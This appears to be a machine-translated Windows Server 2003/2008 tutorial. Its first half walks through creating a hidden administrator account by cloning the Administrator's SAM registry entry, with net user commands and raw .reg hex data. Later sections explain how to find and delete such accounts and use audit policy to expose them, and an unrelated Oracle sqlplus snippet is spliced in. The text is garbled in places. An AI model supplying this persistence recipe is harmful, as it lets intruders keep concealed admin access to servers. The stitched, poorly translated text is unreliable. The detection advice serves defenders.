The method of setting up hidden system users and viewing and deleting under win2003/2008

Create a hidden system user

First prepare, create a new user, named sxitn$ (plus $ symbol, use command NET user will not see users), password is 123:

NET user sxitn$ 123456/add
Then add sxitn$ to the admin group:

net localgroup Administrators sxitn$/add
Then, start->> Run, enter Regedt32.exe, find Sam under Sam under HKEY_LOCAL_MACHINE, right-click-permissions, add user group Administrators or current user to the Security tab, Full control is allowed and application is determined after the shutdown.

Start-> Run, enter regedit to hit the registry. Find hkey_local_machine-sam-sam-domains-aliases-users-names-sxitn$, remember the type->0X3EF the value on the right, and then export, named Sxitn$.reg The 3EF item is found in the users item, also exported, and the item named 3EF.REG;1F4 (the Administrator default item) is also exported, named 1f4.reg.

Open 1f4.reg with Notepad, copy:

"F" =hex:02,00,01,00,00,00,00,00,d0,f6,92,be,05,df,c7,01,00,00,00,00,00,00,00,/
00,80,1c,c5,98,94,2d,c7,01,00,00,00,00,00,00,00,00,10,51,1c,cb,08,df,c7,01,/
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,c0,00,01,00,00,00,00,/
00,00,00,00,00,00,00
Use Notepad to open the 3ef.reg, paste the copy just to the appropriate location.

Open Sxitn$.reg with Notepad, copy:

[hkey_local_machine/sam/sam/domains/account/users/names/sxitn$]
@=hex (3EF):
Paste to the last position of 3ef.reg. The last 3ef.reg is:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE/SAM/SAM/DOMAINS/ACCOUNT/USERS/000003EF]
"F" =hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,/
00,90,97,6d,19,10,df,c7,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,/
ef,03,00,00,01,02,00,00,10,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,/
00,95,7c,4e,2e,20,74
"V" =hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,0c,00,00,00,00,00,00,/
00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,/
c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,/
00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,/
00,00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,/
00,00,00,00,00,00,00,00,00,c8,00,00,00,00,00,00,00,00,00,00,00,c8,00,00,00,/
08,00,00,00,01,00,00,00,d0,00,00,00,14,00,00,00,00,00,00,00,e4,00,00,00,14,/
00,00,00,00,00,00,00,f8,00,00,00,04,00,00,00,00,00,00,00,fc,00,00,00,04,00,/
00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,/
00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,/
00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,/
00,58,00,03,00,00,00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,/
00,00,5b,84,10,ab,37,d9,e9,d7,09,61,8b,28,ef,03,00,00,00,00,18,00,ff,07,0f,/
00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,5b,03,02,00,/
01,01,00,00,00,00,00,01,00,00,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,/
02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,73,00,78,00,69,00,/
74,00,6e,00,24,00,01,02,00,00,07,00,00,00,01,00,01,00,c5,3d,41,62,8b,c0,6f,/
1e,57,d2,4c,dc,4e,20,76,a3,01,00,01,00,47,ad,d7,59,3f,ac,4a,a1,f6,dd,c6,d9,/
bc,1e,8d,15,01,00,01,00,01,00,01,00

[hkey_local_machine/sam/sam/domains/account/users/names/sxitn$]
@=hex (3EF):

and then save. Delete User sxitn$:

NET user sxitn$/delete

Then run 3ef.reg to import the registry! Open Regedt32.exe to remove the administrator from the Sam Security tab and apply it.

In this way, the hidden user is established.

How to view account creation time

1, in your installation when there is a set password, that password is your database administrator password, be sure to remember.
2, such as database installation, after the launch of Oracle database services, with the following command can enter the Sqlplus, in the cmd input sqlplus sys/password as Sysdba
3, after entering the database with the following command to build users:
Create user user_name idnentified by password;
Grant Resource,connect to user_name;
4, now Sqlplus can be entered, in the cmd input sqlplus User_name/password

See if a hidden account is added under the WIN2003 server

Modify a registry-type hidden account

Because accounts that are hidden using this method are not seen in command prompt and Computer Management, you can delete hidden accounts in the registry. Come to the "hkey_local_machinesamsamdomainsaccountusersnames", the existing account and "Computer Management" in the account of the comparison, the more out of the account is hidden account. It is also easy to delete it by simply deleting the item named by the account.

Use Regedit to open Registry Editor

Find [Hkey_local_machine]--[sam]--[sam]--[domains]--[account]--[users], where the following number and letter combinations of subkeys are the SAM entries for all user accounts on your computer.

Sub-branch [Names] is the user name, each corresponding to the above Sam.

Finding hidden accounts is exactly the same as comparing the SAM values of two user names to indicate that one of them is a cloned account. You can delete the user name here.

It is generally recommended to export the user name entries and the corresponding Sam separately, and then find a keyword to analyze the comparison. The specific methods of comparison are varied by looking at them.

At present, there is a system-level back door, you can automatically delete the value of the cloned account here when there is an administrator account login, and then automatically recover when you quit. In this case, this is not to be found out. Generally this kind of back door is the master to do, avoid killing.

In this case, it is recommended to find a professional security personnel to deal with.

In addition: Local Security policy-local policy-The default administrator and VIP account can be viewed in the security option, where the default guest is cloned, and if the account is cloned it will show the true cloned username.

Computer Management is still the normal user, so it doesn't make sense to check there.

Another solution

Start-run

CMD under

Run.........

net localgroup Administrators

Look at that plus $ is a hidden account.

1, right click "My Computer" → "Management" → "Computer Management" → "Local Users and Groups" → "users" → see if there are any unfamiliar users

2, "start" → "Run" → "cmd" → "net user" → See if there are any unfamiliar users
Hidden accounts in the above unseen
3, "start" → "Run" → "cmd" → "regedit" → Find the Registry branch
"hkey_local_machine/sam/sam/domains/account/users/names/" → see if there are any cloned users

Unable to see hidden account for Name

If the hacker has made a modified registry-type hidden account, the administrator's permission to operate the registry has been removed on this basis. The administrator is unable to delete the hidden account through the registry, or even know the hidden account name created by the hacker. But the world is not absolutely, we can use the "Group Policy" help, so that hackers can not login through the hidden account. Click "Start" → "Run", enter "Gpedit.msc" to run Group Policy, expand Computer Configuration → "Windows settings" → "Security Settings" → "Local Policy" → "Audit Policy", double-click "Audit policy change" on the right, and check "success" in the pop-up Settings window. then click OK. Make the same settings for audit logon events and audit process tracking.

After the landing audit, you can record any account login, including hidden accounts, so that we can through the "Computer Management" in the "Event Viewer" accurately know the name of the hidden account, or even the time of the hacker landing. Even if hackers delete all log logs, the system will also record which account deleted the system log, so that the hacker's hidden account will be exposed.